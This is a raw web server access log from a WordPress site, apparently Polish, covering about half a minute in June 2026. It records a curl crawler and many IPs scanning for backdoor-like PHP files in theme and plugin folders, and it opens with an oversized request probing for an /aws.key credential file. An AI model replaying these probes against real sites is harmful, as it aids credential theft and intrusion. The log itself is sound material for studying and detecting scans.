185.177.72.13 - - [16/Jun/2026:22:49:59 +0000] "GET /aws.key?exemple=abc%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%2541%25" 414 186 "-" "-"
185.177.72.13 - - [16/Jun/2026:22:49:59 +0000] "GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1" 200 30432 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:49:59 +0000] "GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1" 200 4885 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:49:59 +0000] "GET /wp-content/themes/astra/assets/js/minified/frontend.min.js HTTP/1.1" 200 5992 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:00 +0000] "GET / HTTP/1.1" 200 27636 "-" "curl/8.7.1"
198.44.157.179 - - [16/Jun/2026:22:50:00 +0000] "GET /wp-config-sample.php?requestszdmiu HTTP/1.1" 500 2443 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5"
178.128.223.15 - - [16/Jun/2026:22:50:00 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)"
185.177.72.13 - - [16/Jun/2026:22:50:00 +0000] "GET /bezpieczne-stosowanie-lekow/ HTTP/1.1" 200 23458 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:01 +0000] "GET /domowa-apteczka/ HTTP/1.1" 200 23609 "-" "curl/8.7.1"
156.238.251.148 - - [16/Jun/2026:22:50:01 +0000] "GET /wp-includes/customize/class-wp-customize-code-editor-control-url.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
185.177.72.13 - - [16/Jun/2026:22:50:02 +0000] "GET /odpornosc-i-zdrowy-styl-zycia/ HTTP/1.1" 200 21761 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:03 +0000] "GET /profilaktyka-zdrowia-calej-rodziny/ HTTP/1.1" 200 23973 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:04 +0000] "GET /artykuly/ HTTP/1.1" 200 21202 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:04 +0000] "GET /polityka-prywatnosci/ HTTP/1.1" 200 25687 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1" 200 2523 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1" 200 18641 "-" "curl/8.7.1"
139.162.91.253 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1" 200 7119 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1" 200 10473 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-content/plugins/elementor/assets/lib/swiper/v8/swiper.min.js HTTP/1.1" 200 39747 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-includes/js/imagesloaded.min.js HTTP/1.1" 200 1815 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /wp-content/plugins/the-post-grid/assets/js/rttpg.js HTTP/1.1" 200 2900 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:05 +0000] "GET /najlepszy-polski-legalny-bukmacher-lv-bet/ HTTP/1.1" 200 22915 "-" "curl/8.7.1"
156.245.246.51 - - [16/Jun/2026:22:50:06 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
108.175.6.223 - - [16/Jun/2026:22:50:06 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:06 +0000] "GET /jak-wzmocnic-odpornosc-przed-sezonem-przeziebien-proste-kroki-dla-calej-rodziny/ HTTP/1.1" 200 24011 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:07 +0000] "GET /najczestsze-bledy-w-przechowywaniu-lekow-ktore-obnizaja-ich-skutecznosc/ HTTP/1.1" 200 23864 "-" "curl/8.7.1"
45.12.135.172 - - [16/Jun/2026:22:50:07 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
178.128.223.15 - - [16/Jun/2026:22:50:07 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)"
185.177.72.13 - - [16/Jun/2026:22:50:07 +0000] "GET /category/vademecum/ HTTP/1.1" 200 21201 "-" "curl/8.7.1"
156.245.246.51 - - [16/Jun/2026:22:50:08 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:08 +0000] "GET /wish-is-very-like-an-american-version-of-aliexpress-and-yow/ HTTP/1.1" 200 22857 "-" "curl/8.7.1"
203.236.145.100 - - [16/Jun/2026:22:50:08 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
36.77.40.17 - - [16/Jun/2026:22:50:09 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:09 +0000] "GET /author/admin/ HTTP/1.1" 200 21494 "-" "curl/8.7.1"
119.28.64.217 - - [16/Jun/2026:22:50:09 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)"
185.177.72.13 - - [16/Jun/2026:22:50:09 +0000] "GET /i-understand-that-those-that-are-on-the-lookout-for/ HTTP/1.1" 200 23027 "-" "curl/8.7.1"
150.109.23.247 - - [16/Jun/2026:22:50:10 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
47.79.119.13 - - [16/Jun/2026:22:50:10 +0000] "GET /wp-content/themes/news-bite/index-session.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:10 +0000] "GET /some-may-be-made-up-of-such-low-quality-supplies-that-theyll/ HTTP/1.1" 200 23427 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:11 +0000] "GET /for-occasion-virtually-all-the-small-wholesale-replica-bag/ HTTP/1.1" 200 23369 "-" "curl/8.7.1"
101.47.74.252 - - [16/Jun/2026:22:50:11 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
47.79.79.35 - - [16/Jun/2026:22:50:11 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)"
47.79.23.252 - - [16/Jun/2026:22:50:11 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:12 +0000] "GET /there-are-loads-of-other-sources-out-there-like-youtube-and/ HTTP/1.1" 200 23287 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:12 +0000] "GET /good-replicas-use-thick-canvas-or-leather-based-that-feels/ HTTP/1.1" 200 23258 "-" "curl/8.7.1"
202.47.89.24 - - [16/Jun/2026:22:50:13 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)"
103.62.49.154 - - [16/Jun/2026:22:50:13 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:13 +0000] "GET /buyers-beware-although-this-is-definitely-one-of-many-extra/ HTTP/1.1" 200 23982 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:14 +0000] "GET /be-knowledgeable-about-your-native-laws-and-be-sincere-with/ HTTP/1.1" 200 23515 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:14 +0000] "GET /our-monogram-empreinte-luggage-characteristic-the-lv-monogram/ HTTP/1.1" 200 23789 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:15 +0000] "GET /worse-some-sites-parade-replicas-as-dupes-or-inspired/ HTTP/1.1" 200 23925 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:16 +0000] "GET /artykuly/page/2/ HTTP/1.1" 200 21289 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:16 +0000] "GET /artykuly/page/1033/ HTTP/1.1" 200 20695 "-" "curl/8.7.1"
172.233.77.45 - - [16/Jun/2026:22:50:16 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
193.168.137.182 - - [16/Jun/2026:22:50:17 +0000] "GET /wp-content/themes/news-bite/search-git.php HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)"
185.177.72.13 - - [16/Jun/2026:22:50:17 +0000] "GET /wp-content/plugins/elementor/assets/lib/swiper/v8/swiper-bundle.min.js.map HTTP/1.1" 404 18945 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:17 +0000] "GET /wp-includes/js/comment-reply.min.js HTTP/1.1" 200 1387 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:18 +0000] "GET /author/ HTTP/1.1" 404 18371 "-" "curl/8.7.1"
13.158.80.209 - - [16/Jun/2026:22:50:18 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
47.79.79.35 - - [16/Jun/2026:22:50:18 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:18 +0000] "GET /zdrowy-sen-naturalny-sposob-na-silniejsza-odpornosc-i-lepsze-samopoczucie/ HTTP/1.1" 200 23669 "-" "curl/8.7.1"
156.238.251.148 - - [16/Jun/2026:22:50:19 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:19 +0000] "GET /category/vademecum/page/2/ HTTP/1.1" 200 21278 "-" "curl/8.7.1"
171.43.64.180 - - [16/Jun/2026:22:50:19 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:20 +0000] "GET /category/vademecum/page/124/ HTTP/1.1" 200 21225 "-" "curl/8.7.1"
165.99.239.85 - - [16/Jun/2026:22:50:20 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:20 +0000] "GET /author/admin/page/2/ HTTP/1.1" 200 21558 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:21 +0000] "GET /author/admin/page/124/ HTTP/1.1" 200 21276 "-" "curl/8.7.1"
139.162.108.209 - - [16/Jun/2026:22:50:21 +0000] "GET /wp-content/plugins/elementor-pro/elementor-pro-condition.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
185.177.72.13 - - [16/Jun/2026:22:50:22 +0000] "GET /whether-youre-chasing-status/ HTTP/1.1" 200 24474 "-" "curl/8.7.1"
140.245.99.105 - - [16/Jun/2026:22:50:22 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:22 +0000] "GET /look-for-pink-flags-similar-to-vague-descriptions/ HTTP/1.1" 200 24115 "-" "curl/8.7.1"
171.43.64.180 - - [16/Jun/2026:22:50:23 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:23 +0000] "GET /some-objects-come-with-a-certificate-of-authenticity/ HTTP/1.1" 200 23265 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:24 +0000] "GET /i-understand-that-those-that-are-in-search-of-high-quality/ HTTP/1.1" 200 23757 "-" "curl/8.7.1"
103.164.107.26 - - [16/Jun/2026:22:50:24 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
171.43.64.180 - - [16/Jun/2026:22:50:24 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:25 +0000] "GET /one-of-the-easiest-methods-to-keep-away-from-fake-purses-is-to/ HTTP/1.1" 200 23411 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:25 +0000] "GET /if-you-like-authenticity-and-provenance/ HTTP/1.1" 200 23971 "-" "curl/8.7.1"
42.114.172.41 - - [16/Jun/2026:22:50:26 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:26 +0000] "GET /besides-youll-be-able-to-hardly-discover-a-specific-product/ HTTP/1.1" 200 23725 "-" "curl/8.7.1"
159.198.35.187 - - [16/Jun/2026:22:50:26 +0000] "GET /wp-content/plugins/webp-converter-for-media/webp-converter-for-media-decryption.php HTTP/1.1" 403 193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.3 Safari/537.36"
185.177.72.13 - - [16/Jun/2026:22:50:27 +0000] "GET /as-mentioned-initially-china-is-the-leading-wholesale/ HTTP/1.1" 200 24060 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:27 +0000] "GET /lawmakers-passed-the-rule-final-yr-which-took-impact-on-jan/ HTTP/1.1" 200 23172 "-" "curl/8.7.1"
198.44.157.179 - - [16/Jun/2026:22:50:28 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:28 +0000] "GET /another-important-consideration-when-deciding-what-to-choose/ HTTP/1.1" 200 23915 "-" "curl/8.7.1"
198.44.157.179 - - [16/Jun/2026:22:50:29 +0000] "GET /wp-content/plugins/romethemeform/autoloader-json.php HTTP/1.1" 403 133 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.177.72.13 - - [16/Jun/2026:22:50:29 +0000] "GET /artykuly/page/3/ HTTP/1.1" 200 21296 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:30 +0000] "GET /artykuly/page/1032/ HTTP/1.1" 200 21113 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:30 +0000] "GET /lv-bet-lv-review-a-leading-choice-for-kazino-online-kazino-live-and-sporta-likmes-in-latvia/ HTTP/1.1" 200 23180 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:50:31 +0000] "GET /category/vademecum/page/3/ HTTP/1.1" 200 21288 "-" "curl/8.7.1"
